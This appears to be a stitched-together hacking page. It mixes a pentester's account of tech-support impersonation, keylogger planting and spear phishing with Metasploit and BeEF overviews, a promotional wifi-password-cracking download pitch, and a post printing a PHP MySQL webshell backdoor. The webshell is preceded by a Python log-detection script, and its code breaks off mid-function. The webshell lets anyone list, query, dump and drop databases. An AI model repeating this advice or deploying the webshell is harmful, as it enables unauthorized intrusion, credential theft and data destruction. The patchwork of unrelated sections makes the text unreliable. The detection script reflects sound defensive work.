Social engineering was always my favorite part, first I would order shirts on zazzle or cafepress that resembled those of the tech support at the location. If the company didn’t have any special identification I would still try and fake something close to what they would expect. This part of the test was to see how many different places I could enter within the organization, every place I could enter that was supposed to be restricted was a finding. The second part of the test was to see how many employees would grant me access to their workstations, I would typically say that we were doing an upgrade or their machine needed to be patched, etc. This is where I would find sticky notes with login and passwords (a finding) and if the contract allowed, I would install my favorite device which was a WiFi hardware keylogger:

Keyghost and Keelog both make great ones which I’ve used close to a hundred times never being detected. I recommend checking them out.

I would also harvest as many e-mails and employee names as I could, I would use them to make calls as tech support requesting passwords and system information. I would also send spear phishing e-mails using company logos, letterhead and signatures trying to entice employees to give up credentials.

In the old old days, around the late 90’s my team had access to the latest 0-day exploits and things were far less organized. We could break into any server we wanted without the victim having any chance.

 

Here are the tools you need to master now:

 

Metasploit – Free version http://www.rapid7.com/products/metasploit/

The basic steps for using the Framework are:

  • Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included).
  • Optionally checking whether the intended target system is susceptible to the chosen exploit.
  • Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server).
  • Choosing the encoding technique so that the intrusion-prevention system (IPS) ignores the encoded payload.
  • Executing the exploit.

This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers.

Metasploit runs on Unix (including Linux and Mac OS X) and on Windows. The Metasploit Framework can be extended to use add-ons in multiple languages.

To choose an exploit and payload, some information about the target system is needed, such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as Nmap. Vulnerability scanners such as Nexpose or Nessus can detect target system vulnerabilities. Metasploit can import vulnerability scan data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.

 

BeEF – The Browser Exploitation Framework Project – Free version https://github.com/beefproject/beef

The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool used to test and exploit web application and browser-based vulnerabilities. BeEF provides the penetration tester with practical client-side attack vectors. It leverages web application and browser vulnerabilities to assess the security of a target and carry out further intrusions. This project is developed for lawful research and penetration testing. In practice, like many information security tools, BeEF is used for both legitimate and unauthorized activities.

BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

BeEF can be used to further exploit a cross-site scripting (XSS) flaw in a web application. The XSS flaw allows an attacker to inject BeEF project JavaScript code into the vulnerable web page. In BeEF terminology, the browser that has visited the vulnerable page is “hooked”. This injected code in the “hooked” browser then responds to commands from the BeEF server. The BeEF server is a Ruby on Rails application that communicates with the “hooked browser” through a web-based user interface. BeEF comes with the BackTrack and Kali Linux distributions.

BeEF can be extended both through the extension API, which allows changes to the way BeEF itself works, and through addition of modules, which add features with which to control “hooked” browsers.

How to Hack WiFi Password (WEP/WPA/WPA2)

An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.

Now to hack a WiFi password you must first know what type of encryption it uses. There are several different types, such as WEP (easiest to crack/hack), WPA and WPA2.

Luckily for you, we developed a program that automates the whole hacking process, and the only thing you need to do is click buttons and wait.

How it works?

To fully understand how this program works you would most likely need a few months to learn the fundamentals of programming. After that you would probably need a few more years (depending on how fast a learner you are) to completely understand how it functions. In short, it scans for available wireless networks in your range and contacts them; after contact is established it receives packets, and after the packets are received it decrypts them, meaning it gets the password with a tool built into our application. Some wireless networks can be hacked in a few moments, some can take a few minutes, and hardly ever hours. This depends on how the victim’s password is made. The ones that are difficult to hack are made of letters (uppercase + lowercase), numbers and special characters. Naturally, many of them are made of just letters and can be hacked extremely quickly.

What security types / encryptions does the software hack?

The software can hack the following encryptions / security types:
– WEP
– WPA
– WPA2

Available for download at http://www.wifi-hacker.org/download.php

 


PHP MySQL Webshell Backdoor File Sample

So, owning close to 100 websites, occasionally one gets hacked, and it just so happened that one of them was compromised the other day. The backdoor that I found on the server was a MySQL one. Here is a sample of the default MySQL webshell backdoor I found on my server.

I take no responsibility with anything that you do with the code, this is being presented for educational purposes only.
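One way to hunt for this backdoor in web server access logs and on disk, built from the `action=` values, request parameters and cookie names that appear in the sample that follows. This is an added example, not part of the original post: the combined log format, the script path, the IP addresses and the log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# action= values used by the sample's links and forms.
SHELL_ACTIONS = {
    "logon_submit", "listDBs", "createDB", "dropDB", "dumpDB",
    "listTables", "createTable", "dropTable", "dumpTable", "query",
    "viewSchema", "addField", "editField", "dropField",
    "addField_submit", "editField_submit", "viewData", "addData",
    "editData", "deleteData", "addData_submit", "editData_submit",
}
# Actions that destroy, export or freely query data: triage these first.
HIGH_IMPACT = {"dropDB", "dumpDB", "dropTable", "dumpTable",
               "dropField", "deleteData", "query"}
# Parameters the sample sends alongside action=.
COMPANIONS = {"dbname", "tablename", "fieldname", "queryStr",
              "username", "password"}
# Literal strings from the sample's source, for on-disk triage.
FILE_MARKERS = ("mysql_web_admin_username", "mysql_web_admin_password",
                "MySQL Web Interface")

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')


def match_request(target):
    """Return a finding dict if the request URL fits the sample, else None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    action = next((a for a in params.get("action", [])
                   if a in SHELL_ACTIONS), None)
    if action is None:
        return None
    # listDBs is the post-login redirect and carries nothing else; any other
    # action without a companion parameter is too generic to flag.
    if action != "listDBs" and not (COMPANIONS & params.keys()):
        return None
    return {
        "path": parts.path,
        "action": action,
        "dbname": params.get("dbname", [""])[0],
        "query": params.get("queryStr", [""])[0],
        # The login form has no method attribute, so it submits via GET and
        # the MySQL credentials end up in the access log.
        "creds_in_url": action == "logon_submit" and "password" in params,
        "high_impact": action in HIGH_IMPACT,
    }


def scan_access_log(lines):
    """Return one finding per log line that matches the sample's URL shape."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hit = match_request(m.group("target")) if m else None
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"),
                       status=int(m.group("status")))
            findings.append(hit)
    return findings


def summarize(findings):
    """Group findings by (client IP, script path) for the incident timeline."""
    summary = {}
    for f in findings:
        s = summary.setdefault((f["ip"], f["path"]), {
            "requests": 0, "databases": set(),
            "high_impact": [], "creds_in_url": False})
        s["requests"] += 1
        if f["dbname"]:
            s["databases"].add(f["dbname"])
        if f["high_impact"]:
            s["high_impact"].append(f["action"])
        s["creds_in_url"] = s["creds_in_url"] or f["creds_in_url"]
    return summary


def scan_source(text):
    """Return the sample's literal markers found in a file's contents."""
    return [marker for marker in FILE_MARKERS if marker in text]


# Constructed sample log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2015:03:14:07 +0000] "GET /uploads/cache.php?action=logon_submit&username=root&password=EXAMPLE HTTP/1.1" 200 112 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Nov/2015:03:14:08 +0000] "GET /uploads/cache.php?action=listDBs HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Nov/2015:03:14:30 +0000] "GET /uploads/cache.php?action=dumpDB&dbname=shop HTTP/1.1" 200 88213 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Nov/2015:03:15:02 +0000] "GET /uploads/cache.php?action=query&dbname=shop&queryStr=SELECT+*+FROM+users HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [12/Nov/2015:03:15:40 +0000] "GET /search.php?action=query HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [12/Nov/2015:03:15:41 +0000] "GET /index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for key, info in summarize(scan_access_log(SAMPLE_LOG)).items():
        print(key, info)
```

A hit with `creds_in_url` set means the database password the intruder used is sitting in the access log, so rotate that MySQL account as part of cleanup.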

 

 

<?
/*
* MySQL Web Interface Version 0.8
* -------------------------------
* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
* License : GNU Public License (GPL)
* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
*/

$HOSTNAME = "localhost";

function logon() {
global $PHP_SELF;

// Clear any stored credentials, then render the login form.
setcookie( "mysql_web_admin_username" );
setcookie( "mysql_web_admin_password" );
echo "<html>\n";
echo "<head>\n";
echo "<title>MySQL Web Interface</title>\n";
echo "</head>\n";
echo "<body>\n";
echo "<table width=100% height=100%><tr><td><center>\n";
echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
echo "<h1>MySQL Web Interface</h1>\n";
// No method attribute, so the form submits with GET and the
// username and password travel in the URL query string.
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=logon_submit>\n";
echo "<table cellpadding=5 cellspacing=1>\n";
echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
echo "</table><p>\n";
echo "<input type=submit value='Enter'>\n";
echo "<input type=reset value='Clear'><br>\n";
echo "</form>\n";
echo "</center></td></tr></table>\n";
echo "</center></td></tr></table>\n";
echo "<p><hr width=300>\n";
echo "<font size=2>\n";
echo "Copyleft &copy; since 1999,\n";
echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is available<br>";
echo "</font>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
}

function logon_submit() {
// $username and $password arrive from the request (register_globals style).
global $username, $password, $PHP_SELF;

// The MySQL credentials are kept in plaintext cookies.
setcookie( "mysql_web_admin_username", $username );
setcookie( "mysql_web_admin_password", $password );
echo "<html>";
echo "<head>";
echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
echo "</head>";
echo "</html>";
}

function echoQueryResult() {
global $queryStr, $errMsg;

if( $errMsg == "" ) $errMsg = "Success";
if( $queryStr != "" ) {
echo "<table cellpadding=5>\n";
echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
echo "</table><p>\n";
}
}

function listDatabases() {
global $mysqlHandle, $PHP_SELF;

echo "<h1>Database List</h1>\n";

echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=createDB>\n";
echo "<input type=text name=dbname>\n";
echo "<input type=submit value='Create Database'>\n";
echo "</form>\n";
echo "<hr>\n";

echo "<table cellspacing=1 cellpadding=5>\n";

$pDB = mysql_list_dbs( $mysqlHandle );
$num = mysql_num_rows( $pDB );
for( $i = 0; $i < $num; $i++ ) {
$dbname = mysql_dbname( $pDB, $i );
echo "<tr>\n";
echo "<td>$dbname</td>\n";
echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
echo "</tr>\n";
}
echo "</table>\n";
}

function createDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;

mysql_create_db( $dbname, $mysqlHandle );
listDatabases();
}

function dropDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;

mysql_drop_db( $dbname, $mysqlHandle );
listDatabases();
}

function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;

echo "<h1>Table List</h1>\n";
echo "<p class=location>$dbname</p>\n";
echoQueryResult();
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=createTable>\n";
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=text name=tablename>\n";
echo "<input type=submit value='Create Table'>\n";
echo "</form>\n";
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=query>\n";
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=text size=40 name=queryStr>\n";
//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
echo "<input type=submit value='Query'>\n";
echo "</form>\n";
echo "<hr>\n";

$pTable = mysql_list_tables( $dbname );

if( $pTable == 0 ) {
$msg = mysql_error();
echo "<h3>Error : $msg</h3><p>\n";
return;
}
$num = mysql_num_rows( $pTable );

echo "<table cellspacing=1 cellpadding=5>\n";

for( $i = 0; $i < $num; $i++ ) {
$tablename = mysql_tablename( $pTable, $i );

echo "<tr>\n";
echo "<td>\n";
echo "$tablename\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
echo "</td>\n";
echo "</tr>\n";
}

echo "</table>";
}

function createTable() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

$queryStr = "CREATE TABLE $tablename ( no INT )";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

listTables();
}

function dropTable() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

$queryStr = "DROP TABLE $tablename";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

listTables();
}

function viewSchema() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

echo "<h1>Table Schema</h1>\n";
echo "<p class=location>$dbname &gt; $tablename</p>\n";

echoQueryResult();

echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
echo "<hr>\n";

$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );

echo "<table cellspacing=1 cellpadding=5>\n";
echo "<tr>\n";
echo "<th>Field</th>\n";
echo "<th>Type</th>\n";
echo "<th>Null</th>\n";
echo "<th>Key</th>\n";
echo "<th>Default</th>\n";
echo "<th>Extra</th>\n";
echo "<th colspan=2>Action</th>\n";
echo "</tr>\n";

for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
echo "<tr>\n";
echo "<td>".$field["Field"]."</td>\n";
echo "<td>".$field["Type"]."</td>\n";
echo "<td>".$field["Null"]."</td>\n";
echo "<td>".$field["Key"]."</td>\n";
echo "<td>".$field["Default"]."</td>\n";
echo "<td>".$field["Extra"]."</td>\n";
$fieldname = $field["Field"];
echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
echo "</tr>\n";
}
echo "</table>\n";
}

function manageField( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

if( $cmd == "add" )
echo "<h1>Add Field</h1>\n";
else if( $cmd == "edit" ) {
echo "<h1>Edit Field</h1>\n";
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
if( $field["Field"] == $fieldname ) {
$fieldtype = $field["Type"];
$fieldkey = $field["Key"];
$fieldextra = $field["Extra"];
$fieldnull = $field["Null"];
$fielddefault = $field["Default"];
break;
}
}
$type = strtok( $fieldtype, " (,)\n" );
if( strpos( $fieldtype, "(" ) ) {
if( $type == "enum" | $type == "set" ) {
$valuelist = strtok( " ()\n" );
} else {
$M = strtok( " (,)\n" );
if( strpos( $fieldtype, "," ) )
$D = strtok( " (,)\n" );
}
}
}

echo "<p class=location>$dbname &gt; $tablename</p>\n";
echo "<form action=$PHP_SELF>\n";

if( $cmd == "add" )
echo "<input type=hidden name=action value=addField_submit>\n";
else if( $cmd == "edit" ) {
echo "<input type=hidden name=action value=editField_submit>\n";
echo "<input type=hidden name=old_name value=$fieldname>\n";
}
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=hidden name=tablename value=$tablename>\n";

echo "<h3>Name</h3>\n";
echo "<input type=text name=name value=$fieldname><p>\n";
?>

<h3>Type</h3>

<font size=2>
* `M' indicates the maximum display size.<br>
* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" ) ) echo "checked";?>></td>
<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
</tr>
</table>
<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
</tr>
</table>

<p>

<?
if( $cmd == "add" )
echo "<input type=submit value='Add Field'>\n";
else if( $cmd == "edit" )
echo "<input type=submit value='Edit Field'>\n";
echo "<input type=button value=Cancel onClick='history.back()'>\n";
echo "</form>\n";
}

function manageField_submit( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type,
$PHP_SELF, $queryStr, $errMsg,
$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value,
$auto_increment, $primary_key, $valuelist;

if( $cmd == "add" )
$queryStr = "ALTER TABLE $tablename ADD $name ";
else if( $cmd == "edit" )
$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";

if( $M != "" )
if( $D != "" )
$queryStr .= "$type($M,$D) ";
else
$queryStr .= "$type($M) ";
else if( $valuelist != "" ) {
$valuelist = stripslashes( $valuelist );
$queryStr .= "$type($valuelist) ";
} else
$queryStr .= "$type ";

$queryStr .= "$unsigned $zerofill $binary ";

if( $default_value != "" )
$queryStr .= "DEFAULT '$default_value' ";

$queryStr .= "$not_null $auto_increment";

mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

// key change
$keyChange = false;
$result = mysql_query( "SHOW KEYS FROM $tablename" );
$primary = "";
while( $row = mysql_fetch_array($result) )
if( $row["Key_name"] == "PRIMARY" ) {
if( $row[Column_name] == $name )
$keyChange = true;
else
$primary .= ", $row[Column_name]";
}
if( $primary_key == "PRIMARY KEY" ) {
$primary .= ", $name";
$keyChange = !$keyChange;
}
$primary = substr( $primary, 2 );
if( $keyChange == true ) {
$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
mysql_query( $q );
$queryStr .= "<br>\n" . $q;
$errMsg .= "<br>\n" . mysql_error();
$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
mysql_query( $q );
$queryStr .= "<br>\n" . $q;
$errMsg .= "<br>\n" . mysql_error();
}

viewSchema();
}

function dropField() {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr , $mysqlHandle );
$errMsg = mysql_error();

viewSchema();
}

function viewData( $queryStr ) {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page,
$rowperpage, $orderby;

echo "<h1>Data in Table</h1>\n";
if( $tablename != "" )
echo "<p class=location>$dbname &gt; $tablename</p>\n";
else
echo "<p class=location>$dbname</p>\n";

$queryStr = stripslashes( $queryStr );
if( $queryStr == "" ) {
$queryStr = "SELECT * FROM $tablename";
if( $orderby != "" )
$queryStr .= " ORDER BY $orderby";
echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
}

$pResult = mysql_db_query( $dbname, $queryStr );
$errMsg = mysql_error();

$GLOBALS[queryStr] = $queryStr;

if( $pResult == false ) {
echoQueryResult();
return;
}
if( $pResult == 1 ) {
$errMsg = "Success";
echoQueryResult();
return;
}

echo "<hr>\n";

$row = mysql_num_rows( $pResult );
$col = mysql_num_fields( $pResult );

if( $row == 0 ) {
echo "No Data Exist!";
return;
}

if( $rowperpage == "" ) $rowperpage = 20;
if( $page == "" ) $page = 0;
else $page--;
mysql_data_seek( $pResult, $page * $rowperpage );

echo "<table cellspacing=1 cellpadding=2>\n";
echo "<tr>\n";
for( $i = 0; $i < $col; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
echo "<th>";
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
echo "</th>\n";
}
echo "<th colspan=2>Action</th>\n";
echo "</tr>\n";

for( $i = 0; $i < $rowperpage; $i++ ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo "<tr>\n";
$key = "";
for( $j = 0; $j < $col; $j++ ) {
$data = $rowArray[$j];

$field = mysql_fetch_field( $pResult, $j );
if( $field->primary_key == 1 )
